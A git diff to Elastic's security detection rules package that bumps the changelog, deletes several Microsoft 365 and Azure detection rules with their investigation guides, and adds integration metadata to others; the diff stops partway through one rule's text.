diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index 2d079aa0a11..b71cfad6263 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml @@ -1,5 +1,10 @@ # newer versions go on top # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production +- version: 8.19.9-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/15680 - version: 8.19.8 changes: - description: Release security rules update diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_207.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_207.json deleted file mode 100644 index 6ad4a2af5e4..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", - "false_positives": [ - "A user sending emails using personal distribution folders may trigger the event." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 User Restricted from Sending Email", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 User Restricted from Sending Email\n\nMicrosoft 365 enforces email sending limits to prevent abuse and ensure service integrity. Adversaries may exploit compromised accounts to send spam or phishing emails, triggering these limits. The detection rule monitors audit logs for successful restrictions by the Security Compliance Center, indicating potential misuse of valid accounts, aligning with MITRE ATT&CK's Initial Access tactic.\n\n### Possible investigation steps\n\n- Review the audit logs in Microsoft 365 to confirm the event details, focusing on entries with event.dataset:o365.audit and event.provider:SecurityComplianceCenter to ensure the restriction was logged correctly.\n- Identify the user account that was restricted by examining the event.action:\"User restricted from sending email\" and event.outcome:success fields to understand which account triggered the alert.\n- Investigate the recent email activity of the restricted user account to determine if there was any unusual or suspicious behavior, such as a high volume of outbound emails or patterns consistent with spam or phishing.\n- Check for any recent changes in account permissions or configurations that might indicate unauthorized access or compromise, aligning with the MITRE ATT&CK technique T1078 for Valid Accounts.\n- Assess whether there are any other related alerts or incidents involving the same user or similar patterns, which could indicate a broader security issue or coordinated attack.\n\n### False positive analysis\n\n- High-volume legitimate email campaigns by marketing or communication teams can trigger sending limits. Coordinate with these teams to understand their schedules and create exceptions for known campaigns.\n- Automated systems or applications using Microsoft 365 accounts for sending notifications or alerts may exceed limits. Identify these accounts and consider using service accounts with appropriate permissions and limits.\n- Users with delegated access to multiple mailboxes might inadvertently trigger restrictions. Review and adjust permissions or create exceptions for these users if their activity is verified as legitimate.\n- Temporary spikes in email activity due to business needs, such as end-of-quarter communications, can cause false positives. Monitor these periods and adjust thresholds or create temporary exceptions as needed.\n- Misconfigured email clients or scripts that repeatedly attempt to send emails can appear as suspicious activity. Ensure proper configuration and monitor for any unusual patterns that may need exceptions.\n\n### Response and remediation\n\n- Immediately disable the compromised user account to prevent further unauthorized email activity and potential spread of phishing or spam.\n- Conduct a password reset for the affected account and enforce multi-factor authentication (MFA) to enhance security and prevent future unauthorized access.\n- Review the audit logs for any additional suspicious activities associated with the compromised account, such as unusual login locations or times, and investigate any anomalies.\n- Notify the affected user and relevant stakeholders about the incident, providing guidance on recognizing phishing attempts and securing their accounts.\n- Escalate the incident to the security operations team for further analysis and to determine if other accounts or systems have been compromised.\n- Implement additional email filtering rules to block similar phishing or spam patterns identified in the incident to prevent recurrence.\n- Update and enhance detection rules and monitoring to quickly identify and respond to similar threats in the future, leveraging insights from the current incident.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "0136b315-b566-482f-866c-1d8e2477ba16_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_207.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_207.json deleted file mode 100644 index 5fe786f4014..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_207.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", - "false_positives": [ - "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Safe Attachment Rule Disabled\n\nMicrosoft 365's Safe Attachment feature enhances security by analyzing email attachments in a secure environment to detect unknown malware. Disabling this rule can expose organizations to threats by allowing potentially harmful attachments to bypass scrutiny. Adversaries may exploit this to exfiltrate data or avoid detection. The detection rule monitors audit logs for successful attempts to disable this feature, signaling potential defense evasion activities.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Disable-SafeAttachmentRule\" to identify the user or account responsible for the action.\n- Check the event.outcome field to confirm the success of the rule being disabled and gather additional context from related logs around the same timestamp.\n- Investigate the event.provider \"Exchange\" to determine if there are any other recent suspicious activities or changes made by the same user or account.\n- Assess the event.category \"web\" to understand if there were any web-based interactions or anomalies that coincide with the disabling of the safe attachment rule.\n- Evaluate the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats.\n- Cross-reference the identified user or account with known insider threat indicators or previous security incidents to assess the likelihood of malicious intent.\n\n### False positive analysis\n\n- Routine administrative changes can trigger alerts when IT staff disable Safe Attachment rules for legitimate reasons, such as testing or maintenance. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Automated scripts or third-party tools used for email management might disable Safe Attachment rules as part of their operations. Identify these tools and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses.\n- Changes in organizational policy or security configurations might necessitate temporary disabling of Safe Attachment rules. Document these policy changes and adjust the monitoring rules to account for these temporary exceptions.\n- Training or onboarding sessions for new IT staff might involve disabling Safe Attachment rules as part of learning exercises. Ensure these activities are logged and excluded from alerts by setting up temporary exceptions for training periods.\n\n### Response and remediation\n\n- Immediately re-enable the Safe Attachment Rule in Microsoft 365 to restore the security posture and prevent further exposure to potentially harmful attachments.\n- Conduct a thorough review of recent email logs and quarantine any suspicious attachments that were delivered during the period the rule was disabled.\n- Isolate any systems or accounts that interacted with suspicious attachments to prevent potential malware spread or data exfiltration.\n- Escalate the incident to the security operations team for further investigation and to determine if there was any unauthorized access or data compromise.\n- Implement additional monitoring on the affected accounts and systems to detect any signs of ongoing or further malicious activity.\n- Review and update access controls and permissions to ensure that only authorized personnel can modify security rules and configurations.\n- Conduct a post-incident analysis to identify the root cause and implement measures to prevent similar incidents, such as enhancing alerting mechanisms for critical security rule changes.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_103.json b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_103.json deleted file mode 100644 index 94e6067a2e8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_103.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure AD Global Administrator Role Assigned", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure AD Global Administrator Role Assigned\n\nAzure AD's Global Administrator role grants comprehensive access to manage Azure AD and associated services. Adversaries may exploit this by assigning themselves or others to this role, ensuring persistent control over resources. The detection rule identifies such unauthorized assignments by monitoring specific audit logs for role changes, focusing on the addition of members to the Global Administrator role, thus helping to mitigate potential security breaches.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to identify the user account that performed the \"Add member to role\" operation, focusing on the specific event dataset and operation name.\n- Verify the identity of the user added to the Global Administrator role by examining the modified properties in the audit logs, specifically the new_value field indicating \"Global Administrator\".\n- Check the history of role assignments for the identified user to determine if this is a recurring pattern or a one-time event.\n- Investigate the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access.\n- Review any recent changes or activities performed by the newly assigned Global Administrator to identify any suspicious actions or configurations that may have been altered.\n- Consult with the organization's IT or security team to confirm if the role assignment was authorized and aligns with current administrative needs or projects.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role temporarily for maintenance or configuration purposes. To manage this, create exceptions for known IT personnel or scheduled maintenance windows.\n- Automated scripts or third-party applications that require elevated permissions might be flagged if they are configured to add users to the Global Administrator role. Review and whitelist these scripts or applications if they are verified as safe and necessary for operations.\n- Organizational changes, such as mergers or restructuring, can lead to legitimate role assignments that appear suspicious. Implement a review process to verify these changes and exclude them from triggering alerts if they align with documented organizational changes.\n- Training or onboarding sessions for new IT staff might involve temporary assignment to the Global Administrator role. Establish a protocol to document and exclude these training-related assignments from detection alerts.\n\n### Response and remediation\n\n- Immediately remove any unauthorized users from the Global Administrator role to prevent further unauthorized access and control over Azure AD resources.\n- Conduct a thorough review of recent audit logs to identify any additional unauthorized changes or suspicious activities associated with the compromised account or role assignments.\n- Reset the credentials of the affected accounts and enforce multi-factor authentication (MFA) to enhance security and prevent further unauthorized access.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement conditional access policies to restrict Global Administrator role assignments to specific, trusted locations or devices.\n- Review and update role assignment policies to ensure that only a limited number of trusted personnel have the ability to assign Global Administrator roles.\n- Enhance monitoring and alerting mechanisms to detect similar unauthorized role assignments in the future, ensuring timely response to potential threats.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\nazure.auditlogs.operation_name:\"Add member to role\" and\nazure.auditlogs.properties.target_resources.0.modified_properties.1.new_value:\"\\\"Global Administrator\\\"\"\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.new_value", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "04c5a96f-19c5-44fd-9571-a0b033f9086f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.003", - "name": "Additional Cloud Roles", - "reference": "https://attack.mitre.org/techniques/T1098/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "04c5a96f-19c5-44fd-9571-a0b033f9086f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_103.json b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_103.json deleted file mode 100644 index 3fe2e584212..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective.", - "false_positives": [ - "Azure Front Web Application Firewall (WAF) Policy deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Azure Front Web Application Firewall (WAF) Policy deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Frontdoor Web Application Firewall (WAF) Policy Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Frontdoor Web Application Firewall (WAF) Policy Deleted\n\nAzure Frontdoor WAF policies are crucial for protecting web applications by filtering and monitoring HTTP requests to block malicious traffic. Adversaries may delete these policies to bypass security measures, facilitating unauthorized access or data exfiltration. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, signaling potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by filtering for the operation name \"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs.\n- Check the timestamp of the deletion event to determine if it coincides with any other suspicious activities or alerts in the environment.\n- Investigate the context of the deletion by reviewing any recent changes or incidents involving the affected Azure Frontdoor instance or related resources.\n- Assess the impact of the deletion by identifying which web applications were protected by the deleted WAF policy and evaluating their current exposure to threats.\n- Review access logs and network traffic for the affected web applications to detect any unusual or unauthorized access attempts following the policy deletion.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel may lead to the deletion of WAF policies. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scripts or tools used for infrastructure management might delete and recreate WAF policies as part of their normal operation. Identify these scripts and exclude their activity from triggering alerts.\n- Changes in organizational policy or architecture could necessitate the removal of certain WAF policies. Document these changes and adjust the detection rule to account for them by excluding specific policy names or identifiers.\n- Test environments may frequently add and remove WAF policies as part of development cycles. Consider excluding activity from test environments by filtering based on resource group names or tags associated with non-production environments.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Frontdoor instance to prevent further unauthorized access or data exfiltration.\n- Review Azure activity logs to identify the user or service principal responsible for the deletion and assess their access permissions.\n- Recreate the deleted WAF policy using the latest backup or configuration template to restore security controls.\n- Implement conditional access policies to restrict access to Azure management operations, ensuring only authorized personnel can modify WAF policies.\n- Notify the security operations team and relevant stakeholders about the incident for further investigation and monitoring.\n- Conduct a post-incident review to identify gaps in security controls and update incident response plans accordingly.\n- Enhance monitoring by setting up alerts for any future deletions of critical security policies to ensure rapid detection and response.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#networking" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "09d028a5-dcde-409f-8ae0-557cef1b7082", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Network Security Monitoring", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "09d028a5-dcde-409f-8ae0-557cef1b7082_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2.json deleted file mode 100644 index e86c0b1a8ee..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2.json +++ /dev/null @@ -1,133 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources in Microsoft 365 on-behalf-of the user.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-o365**" - ], - "investigation_fields": { - "field_names": [ - "@timestamp", - "event.action", - "event.outcome", - "o365.audit.UserId", - "o365.audit.ObjectId", - "o365.audit.Actor.Type", - "o365.audit.Target.Type", - "o365.audit.ModifiedProperties.ConsentAction_Reason.NewValue", - "o365.audit.ExtendedProperties.additionalDetails", - "cloud.region" - ] - }, - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Illicit Consent Grant via Registered Application", - "new_terms_fields": [ - "o365.audit.UserId", - "o365.audit.ObjectId" - ], - "note": "## Triage and analysis\n\n### Investigating Microsoft 365 Illicit Consent Grant via Registered Application\n\nAdversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These apps can access sensitive Microsoft 365 data\u2014such as mail, profiles, and files\u2014on behalf of the user once consent is granted. This activity is often initiated through spearphishing campaigns that direct the user to a pre-crafted OAuth consent URL.\n\nThis rule identifies a new consent grant to an application using Microsoft 365 audit logs. Additionally, this is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days.\n\n#### Possible investigation steps\n\n- **Review the app in Entra ID**:\n - Go to **Enterprise Applications** in the Azure portal.\n - Search for the `AppId` or name from `o365.audit.ObjectId`.\n - Review granted API permissions and whether admin consent was required.\n - Check the `Publisher` and `Verified` status.\n\n- **Assess the user who granted consent**:\n - Investigate `o365.audit.UserId` (e.g., `terrance.dejesus@...`) for signs of phishing or account compromise.\n - Check if the user was targeted in recent phishing simulations or campaigns.\n - Review the user\u2019s sign-in logs for suspicious geolocation, IP, or device changes.\n\n- **Determine scope and risk**:\n - Use the `ConsentContext_IsAdminConsent` and `ConsentContext_OnBehalfOfAll` flags to assess privilege level.\n - If `offline_access` or `Mail.Read` was granted, consider potential data exposure.\n - Cross-reference affected `Target` objects with known business-critical assets or data owners.\n\n- **Correlate additional telemetry**:\n - Review logs from Defender for Cloud Apps (MCAS), Microsoft Purview, or other DLP tooling for unusual access patterns.\n - Search for `AppId` across your tenant to determine how widely it's used.\n\n### False positive analysis\n\n- Not all consent grants are malicious. Verify if the app is business-approved, listed in your app catalog, or commonly used by users in that role or department.\n- Consent reasons like `WindowsAzureActiveDirectoryIntegratedApp` could relate to integrated services, though these still require verification.\n\n### Response and remediation\n\n- **If the app is confirmed malicious**:\n - Revoke OAuth consent using the [Microsoft Graph API](https://learn.microsoft.com/en-us/graph/api/oauth2permissiongrant-delete).\n - Remove any related service principals from Entra ID.\n - Block the app via the Conditional Access \"Grant\" control or Defender for Cloud Apps policies.\n - Revoke refresh tokens and require reauthentication for affected users.\n - Notify end-users and IT of the potential exposure.\n - Activate your phishing or OAuth abuse response playbook.\n\n- **Prevent future misuse**:\n - Enable the [Admin consent workflow](https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) to restrict user-granted consent.\n - Audit and reduce overprivileged applications in your environment.\n - Consider using Defender for Cloud Apps OAuth app governance.\n\n", - "query": "event.dataset: \"o365.audit\"\n and o365.audit.Actor.Type: 5\n and event.action: \"Consent to application.\"\n and event.outcome: \"success\"\n and o365.audit.Target.Type: (0 or 2 or 3 or 9 or 10)\n", - "references": [ - "https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", - "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", - "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps", - "https://learn.microsoft.com/en-us/office/office-365-management-api/office-365-management-activity-api-schema" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.11.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Actor.Type", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Target.Type", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "0c3c80de-08c2-11f0-bd11-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Credential Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 2 - }, - "id": "0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json b/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json index 76dedd3da85..cd10cb4c923 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json +++ b/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json @@ -19,6 +19,12 @@ "https://github.com/dirkjanm/ROADtools", "https://attack.mitre.org/techniques/T1078/004/" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "0d3d2254-2b4a-11f0-a019-f661ea17fbcc", "setup": "#### Required Microsoft Entra ID Sign-In and Graph Activity Logs\nThis rule requires the Microsoft Entra ID Sign-In Logs and Microsoft Graph Activity Logs integration to be enabled and configured to collect audit and activity logs via Azure Event Hub.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json b/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json index db5efb7cc11..8495a712164 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json @@ -41,6 +41,13 @@ "references": [ "https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 47, "rule_id": "0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_207.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_207.json deleted file mode 100644 index 63d80a48571..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_207.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "SharePoint Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it 